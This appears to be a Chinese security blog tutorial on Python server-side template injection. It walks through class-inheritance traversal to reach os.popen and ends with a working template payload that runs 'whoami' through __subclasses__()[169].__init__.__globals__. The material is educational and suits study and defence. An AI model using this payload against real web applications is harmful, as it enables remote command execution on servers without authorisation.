<p><img class="lazyload lazyload-style-1" src="data:image/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+"  data-original="/img/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/2025_11_24_3.png" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC"></p>

<h4 id="继承关系"><a href="#继承关系" class="headerlink" title="继承关系"></a>继承关系</h4><p>在 Python 中，所有类都默认或显式地继承自一个基类，即内置的 <code>object</code> 类。SSTI 攻击利用的就是 Python 模板引擎在渲染用户输入时，用户可以通过一系列魔术方法进行“类继承链漫游”，最终找到一个可以执行系统命令或读取文件的危险函数&#x2F;模块。</p>
<pre><code class="hljs python"><span class="hljs-keyword">class</span> <span class="hljs-title class_">a</span>:<span class="hljs-keyword">pass</span>
<span class="hljs-keyword">class</span> <span class="hljs-title class_">b</span>(<span class="hljs-title class_ inherited__">a</span>):<span class="hljs-keyword">pass</span>
<span class="hljs-keyword">class</span> <span class="hljs-title class_">c</span>(<span class="hljs-title class_ inherited__">b</span>):<span class="hljs-keyword">pass</span>
c = c()
<span class="hljs-built_in">print</span>(c.__class__)<span class="hljs-comment">#__class__:找到它的当前类</span>
<span class="hljs-built_in">print</span>(c.__class__.__base__)<span class="hljs-comment">#__base__:找到当前类的父类，也就是b类</span>
<span class="hljs-built_in">print</span>(c.__class__.__base__.__base__)<span class="hljs-comment">#a类</span>
<span class="hljs-built_in">print</span>(c.__class__.__base__.__base__.__base__)<span class="hljs-comment">#a类的父类，object类</span>
<span class="hljs-built_in">print</span>(c.__class__.__mro__)<span class="hljs-comment">#包含所有父类的元组，与 __base__ 类似，但可以获取多个父类</span>
<span class="hljs-built_in">print</span>(c.__class__.__mro__[<span class="hljs-number">3</span>])<span class="hljs-comment">#加上下标就能拿到指定的类</span>
<span class="hljs-built_in">print</span>(c.__class__.__mro__[<span class="hljs-number">3</span>].__subclasses__())<span class="hljs-comment">#返回一个列表，包含所有直接继承自该类的子类。这是关键，因为通过它，可以从object遍历到所有当前运行环境中加载的类，包括含有我们RCE所需的函数/模块的类</span></code></pre>

<pre><code class="hljs powershell">[<span class="hljs-type">Running</span>] python <span class="hljs-literal">-u</span> <span class="hljs-string">&quot;d:\desktop\src\code\CTF\tempCodeRunnerFile.py&quot;</span>
&lt;<span class="hljs-class"><span class="hljs-keyword">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">c</span>&#x27;&gt;</span>
<span class="hljs-class">&lt;<span class="hljs-title">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">b</span>&#x27;&gt;</span>
<span class="hljs-class">&lt;<span class="hljs-title">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">a</span>&#x27;&gt;</span>
<span class="hljs-class">&lt;<span class="hljs-title">class</span> &#x27;<span class="hljs-title">object</span>&#x27;&gt;</span>
<span class="hljs-class">(&lt;<span class="hljs-title">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">c</span>&#x27;&gt;, &lt;<span class="hljs-title">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">b</span>&#x27;&gt;, &lt;<span class="hljs-title">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">a</span>&#x27;&gt;, &lt;<span class="hljs-title">class</span> &#x27;<span class="hljs-title">object</span>&#x27;&gt;)</span>
<span class="hljs-class">&lt;<span class="hljs-title">class</span> &#x27;<span class="hljs-title">object</span>&#x27;&gt;</span>
<span class="hljs-class">[&lt;<span class="hljs-title">class</span> &#x27;<span class="hljs-title">type</span>&#x27;&gt;, &lt;<span class="hljs-title">class</span> &#x27;<span class="hljs-title">async_generator</span>&#x27;&gt;, ...</span></code></pre>

<p><img class="lazyload lazyload-style-1" src="data:image/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+"  data-original="/img/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/2025_11_24_4.png" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC"></p>

<p>在这串代码里面，创建了a、b、c三个类，c类继承b类，b类继承a类，a类默认继承object类。</p>
<p>这里读取object类的子类的时候，输出不换行，而且检索比较麻烦，这里写了一个通用脚本来给输出进行换行和编号，便于我们找到指定的类。</p>
<pre><code class="hljs python"><span class="hljs-keyword">import</span> re

subclasses_string = (
    <span class="hljs-string">&quot;&lt;class &#x27;type&#x27;&gt;, &lt;class &#x27;async_generator&#x27;&gt;, ..., &lt;class &#x27;__main__.a&#x27;&gt;&quot;</span>)<span class="hljs-comment">#这里替换输出</span>
pattern = <span class="hljs-string">r&quot;&lt;class\s+.*?&gt;&quot;</span>
class_list = re.findall(pattern, subclasses_string)

output_filename = <span class="hljs-string">&quot;subclasses.txt&quot;</span>

<span class="hljs-keyword">try</span>:
    <span class="hljs-keyword">with</span> <span class="hljs-built_in">open</span>(output_filename, <span class="hljs-string">&#x27;w&#x27;</span>, encoding=<span class="hljs-string">&#x27;utf-8&#x27;</span>) <span class="hljs-keyword">as</span> f:
        output_content = <span class="hljs-string">&quot;\n&quot;</span>.join(class_list)
        f.write(output_content)
    
    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;成功将 <span class="hljs-subst">&#123;<span class="hljs-built_in">len</span>(class_list)&#125;</span> 个子类信息输出到文件：<span class="hljs-subst">&#123;output_filename&#125;</span>&quot;</span>)
    <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;文件内容一个类占一行。&quot;</span>)

<span class="hljs-keyword">except</span> IOError:
    <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;写入文件 <span class="hljs-subst">&#123;output_filename&#125;</span> 时发生错误。请检查文件权限。&quot;</span>)</code></pre>

<p>检索输出得到的信息，找我们能拿来进行RCCE的类，这里就给出一个类&lt;class ‘os._wrap_close’&gt;，索引是170，但是首位是0，所以应该是列表的第169个。</p>
<pre><code class="hljs python"><span class="hljs-keyword">class</span> <span class="hljs-title class_">a</span>:<span class="hljs-keyword">pass</span>
<span class="hljs-keyword">class</span> <span class="hljs-title class_">b</span>(<span class="hljs-title class_ inherited__">a</span>):<span class="hljs-keyword">pass</span>
<span class="hljs-keyword">class</span> <span class="hljs-title class_">c</span>(<span class="hljs-title class_ inherited__">b</span>):<span class="hljs-keyword">pass</span>
c = c()
<span class="hljs-built_in">print</span>(c.__class__)<span class="hljs-comment">#__class__:找到它的当前类</span>
<span class="hljs-built_in">print</span>(c.__class__.__base__)<span class="hljs-comment">#__base__:找到当前类的父类，也就是b类</span>
<span class="hljs-built_in">print</span>(c.__class__.__base__.__base__)<span class="hljs-comment">#a类</span>
<span class="hljs-built_in">print</span>(c.__class__.__base__.__base__.__base__)<span class="hljs-comment">#a类的父类，object类</span>
<span class="hljs-built_in">print</span>(c.__class__.__mro__)<span class="hljs-comment">#包含所有父类的元组，与 __base__ 类似，但可以获取多个父类</span>
<span class="hljs-built_in">print</span>(c.__class__.__mro__[<span class="hljs-number">3</span>])<span class="hljs-comment">#加上下标就能拿到指定的类</span>
<span class="hljs-comment">#print(c.__class__.__mro__[3].__subclasses__())</span>
<span class="hljs-comment"># #返回一个列表，包含所有直接继承自该类的子类。这是关键，因为通过它，可以从object遍历到所有当前运行环境中加载的类，包括含有我们RCE所需的函数/模块的类</span>
<span class="hljs-built_in">print</span>(c.__class__.__mro__[<span class="hljs-number">3</span>].__subclasses__()[<span class="hljs-number">169</span>])
<span class="hljs-built_in">print</span>(c.__class__.__mro__[<span class="hljs-number">3</span>].__subclasses__()[<span class="hljs-number">169</span>].__init__)
<span class="hljs-comment">#__init__ 返回一个函数对象,获取一个可以访问__globals__ 字典的跳板，从而访问到内置函数集__builtins__</span>
<span class="hljs-comment">#print(c.__class__.__mro__[3].__subclasses__()[169].__init__.__globals__)</span>
<span class="hljs-comment">#很多全局变量都在里面，我们需要进行rce，就要找到能执行系统命令的方法。这里用popen函数来执行系统命令</span>
<span class="hljs-built_in">print</span>(c.__class__.__mro__[<span class="hljs-number">3</span>].__subclasses__()[<span class="hljs-number">169</span>].__init__.__globals__[<span class="hljs-string">&#x27;popen&#x27;</span>])
<span class="hljs-built_in">print</span>(c.__class__.__mro__[<span class="hljs-number">3</span>].__subclasses__()[<span class="hljs-number">169</span>].__init__.__globals__[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-string">&#x27;whoami&#x27;</span>).read())</code></pre>

<pre><code class="hljs powershell">[<span class="hljs-type">Running</span>] python <span class="hljs-literal">-u</span> <span class="hljs-string">&quot;d:\desktop\src\code\CTF\python_class.py&quot;</span>
&lt;<span class="hljs-class"><span class="hljs-keyword">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">c</span>&#x27;&gt;</span>
<span class="hljs-class">&lt;<span class="hljs-title">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">b</span>&#x27;&gt;</span>
<span class="hljs-class">&lt;<span class="hljs-title">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">a</span>&#x27;&gt;</span>
<span class="hljs-class">&lt;<span class="hljs-title">class</span> &#x27;<span class="hljs-title">object</span>&#x27;&gt;</span>
<span class="hljs-class">(&lt;<span class="hljs-title">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">c</span>&#x27;&gt;, &lt;<span class="hljs-title">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">b</span>&#x27;&gt;, &lt;<span class="hljs-title">class</span> &#x27;__<span class="hljs-title">main__</span>.<span class="hljs-title">a</span>&#x27;&gt;, &lt;<span class="hljs-title">class</span> &#x27;<span class="hljs-title">object</span>&#x27;&gt;)</span>
<span class="hljs-class">&lt;<span class="hljs-title">class</span> &#x27;<span class="hljs-title">object</span>&#x27;&gt;</span>
<span class="hljs-class">&lt;<span class="hljs-title">class</span> &#x27;<span class="hljs-title">os</span>._<span class="hljs-title">wrap_close</span>&#x27;&gt;</span>
<span class="hljs-class">&lt;<span class="hljs-title">function</span> _<span class="hljs-title">wrap_close</span>.__<span class="hljs-title">init__</span> <span class="hljs-title">at</span> 0<span class="hljs-title">x000001C4097E1010</span>&gt;</span>
<span class="hljs-class">&lt;<span class="hljs-title">function</span> <span class="hljs-title">popen</span> <span class="hljs-title">at</span> 0<span class="hljs-title">x000001C4097E0EB0</span>&gt;</span>
<span class="hljs-class"><span class="hljs-title">wolf</span>\<span class="hljs-title">admin</span></span></code></pre>

<p>通过找到指定的类之后，攻击链通常是类—-类的构造函数—-构造函数所处的模块全局变量，所以需要__init__作为跳板，来获得__globals__ 字典。</p>
<p>这里执行命令要用 read()方法来读取数据，因为popen函数会执行传入的 shell 命令，并返回一个文件对象，而不是我们需要的命令回显数据。</p>
<p>最后可以看到成功执行命令，这也是一般ssti的攻击思路。</p>
<h4 id="魔术方法"><a href="#魔术方法" class="headerlink" title="魔术方法"></a>魔术方法</h4><p>总结一下常用的的魔术方法</p>
<table>
<thead>
<tr>
<th><strong>属性&#x2F;方法</strong></th>
<th><strong>返回值</strong></th>
</tr>
</thead>
<tbody><tr>
<td><code>.__class__</code></td>
<td>对象的类</td>
</tr>
<tr>
<td><code>.__base__</code></td>
<td>类的直接父类</td>
</tr>
<tr>
<td><code>.__bases__</code></td>
<td>所有直接父类的元组</td>
</tr>
<tr>
<td><code>.__mro__</code></td>
<td>方法解析顺序元组</td>
</tr>
<tr>
<td><code>.__subclasses__()</code></td>
<td>继承自该类的所有子类的列表</td>
</tr>
<tr>
<td><code>.__init__</code></td>
<td>类的构造函数</td>
</tr>
<tr>
<td><code>.__globals__</code></td>
<td>函数所在模块的全局命名空间</td>
</tr>
<tr>
<td><code>[&#39;__builtins__&#39;]</code></td>
<td>Python 的内置函数集</td>
</tr>
<tr>
<td><code>.__import__()</code></td>
<td>Python 的导入函数</td>
</tr>
</tbody></table>
<h4 id="SSTI注入"><a href="#SSTI注入" class="headerlink" title="SSTI注入"></a>SSTI注入</h4><p><img class="lazyload lazyload-style-1" src="data:image/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+"  data-original="/img/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/2025_11_24_5.png" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB/AAffA0nNPuCLAAAAAElFTkSuQmCC"></p>

<p>payload：</p>
<pre><code class="hljs python">&#123;&#123;<span class="hljs-string">&#x27;&#x27;</span>.__class__.__base__.__subclasses__()[<span class="hljs-number">169</span>].__init__.__globals__[<span class="hljs-string">&#x27;popen&#x27;</span>](<span class="hljs-string">&#x27;whoami&#x27;</span>).read()&#125;&#125;</code></pre>

<p>我们不知道有哪些现成的类，可以用’’.__class__或者””.__class__，返回的就是&lt;class ‘str’&gt;，此时访问父类就是object。</p>
<p>(其他类型有待更新…)</p>

	</div>

	

	

	
		<div class="post-tags">
			<i class="fa fa-tags" aria-hidden="true"></i>
			<a class="tag badge badge-secondary post-meta-detail-tag -none-link" href="/tags/Python/" rel="tag">Python</a><a class="tag badge badge-secondary post-meta-detail-tag -none-link" href="/tags/SSTI/" rel="tag">SSTI</a><a class="tag badge badge-secondary post-meta-detail-tag -none-link" href="/tags/%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5/" rel="tag">模板注入</a>
		</div>
	
</article>

	<div id="share_container">
	<div id="share" data-initialized="true">
		<a class="no-pjax icon-wechat" tooltip="分享到微信">
			<button class="btn btn-icon btn-success">
				<span class="btn-inner--icon"><i class="fa fa-weixin"></i></span>
			</button>
		</a>
		<a target="_blank" class="no-pjax icon-douban" tooltip="分享到豆瓣">
			<button class="btn btn-icon btn-primary" style="background: #209261;border: none;">
				豆
			</button>
		</a>
		<a target="_blank" class="no-pjax icon-qq" tooltip="分享到 QQ">
			<button class="btn btn-icon btn-primary" style="background: #2196f3;border: none;">
				<span class="btn-inner--icon"><i class="fa fa-qq"></i></span>
			</button>
		</a>
		<a target="_blank" class="no-pjax icon-qzone" tooltip="分享到 QQ 空间">
			<button class="btn btn-icon btn-primary" style="background: #ffc107;border: none;">
				<span class="btn-inner--icon"><i class="fa fa-star"></i></span>
			</button>
		</a>
		<a target="_blank" class="no-pjax icon-weibo" tooltip="分享到微博">
			<button class="btn btn-icon btn-warning">
				<span class="btn-inner--icon"><i class="fa fa-weibo"></i></span>
			</button>
		</a>
		<a target="_blank" class="no-pjax icon-facebook" tooltip="分享到 Facebook">
			<button class="btn btn-icon btn-primary" style="background: #283593;border: none;">
				<span class="btn-inner--icon"><i class="fa fa-facebook"></i></span>
			</button>
		</a>
		<a target="_blank" class="no-pjax icon-twitter" tooltip="分享到 Twitter">
			<button class="btn btn-icon btn-primary" style="background: #03a9f4;border: none;">
				<span class="btn-inner--icon"><i class="fa fa-twitter"></i></span>
			</button>
		</a>
		<a target="_blank" class="no-pjax icon-telegram" href="https://telegram.me/share/url?url=http://wo1fyr.github.io/2026/04/23/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/&text=SSTI原理解析" tooltip="分享到 Telegram">
			<button class="btn btn-icon btn-primary" style="background: #42a5f5;border: none;">
				<span class="btn-inner--icon"><i class="fa fa-telegram"></i></span>
			</button>
		</a>
		<a target="_blank" class="no-pjax icon-copy-link" id="share_copy_link" tooltip="复制链接">
			<button class="btn btn-icon btn-default">
				<span class="btn-inner--icon"><i class="fa fa-link"></i></span>
			</button>
		</a>
	</div>
	<button id="share_show" class="btn btn-icon btn-primary" tooltip="分享">
		<span class="btn-inner--icon"><i class="fa fa-share"></i></span>
	</button>
</div>
<script type="text/javascript">
	socialShare("#share", {
	    title : 'SSTI原理解析',
	    description : `SSTI(Server-Side Template Injection)，服务端模板注入。
一、预备...`,
	    wechatQrcodeTitle : "分享到微信",
	    wechatQrcodeHelper : '微信扫描二维码',
	    source : 'http://wo1fyr.github.io/2026/04/23/ssti%E5%8E%9F%E7%90%86%E8%A7%A3%E6%9E%90/'
	});
	$("#share_show")[0].onclick = function(){
		$("#share_container").addClass("opened");
	};
	$("#share_copy_link")[0].onclick = function(){
		let input = document.createElement('input');
		document.body.appendChild(input);
		input.setAttribute("value", window.location.href);
		input.setAttribute("readonly", "readonly");
		input.setAttribute("style", "opacity: 0;mouse-events:none;");
		input.select();
		if (document.execCommand('copy')){
			iziToast.show({
				title: '链接已复制',
				message: "链接已复制到剪贴板",
				class: 'shadow',
				position: 'topRight',
				backgroundColor: '#2dce89',
				titleColor: '#ffffff',
				messageColor: '#ffffff',
				iconColor: '#ffffff',
				progressBarColor: '#ffffff',
				icon: 'fa fa-check',
				timeout: 5000
			});
		}else{
			iziToast.show({
				title: '复制失败',
				message: "请手动复制链接",
				class: 'shadow',
				position: 'topRight',
				backgroundColor: '#f5365c',
				titleColor: '#ffffff',
				messageColor: '#ffffff',
				iconColor: '#ffffff',
				progressBarColor: '#ffffff',
				icon: 'fa fa-close',
				timeout: 5000
			});
		}
		document.body.removeChild(input);
	};
</script>





<div class="post-navigation card shadow-sm"><div class="post-navigation-item post-navigation-pre"><span class="page-navigation-extra-text"><i class="fa fa-arrow-circle-o-left" aria-hidden="true"></i>上一篇</span><a href="/2026/04/23/XSS%E5%8E%9F%E5%9E%8B%E9%93%BE%E6%B1%A1%E6%9F%93/" rel="prev"> 原型链污染-概念解析</a></div><div class="post-navigation-item post-navigation-next"><span class="page-navigation-extra-text">下一篇 <i class="fa fa-arrow-circle-o-right" aria-hidden="true"></i></span><a href="/2026/04/23/rc4%E5%8A%A0%E5%AF%86%E8%84%9A%E6%9C%AC/" rel="next"> 收集的一些脚本</a></div></div>




		
		
		
		

					<footer id="footer" class="site-footer card shadow-sm border-0">
						
						<div>Theme <a target="_blank" rel="noopener" href="https://github.com/solstice23/hexo-theme-argon"><strong>Argon</strong></a> | Powered by Hexo</div>
						<span id="busuanzi_container_site_uv">
							本站访客数 <span id="busuanzi_value_site_uv"></span> 人次
						</span>
					</footer>
				</main>
			</div>
		</div>
		
<script src="/argontheme.js"></script>

		
		
		

		
			<script>
				var argonEnableCodeHighlight = true;
			</script>
			
<link rel="stylesheet" href="/assets/vendor/highlight/styles/github.css">

		

	</div>
</div>
<noscript>
	<style>
		article img.lazyload[src^="data:image/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPg"]{display: none;}
		.comment-item-text .comment-sticker.lazyload{display: none;}
	</style>
</noscript>
</body>



</html>

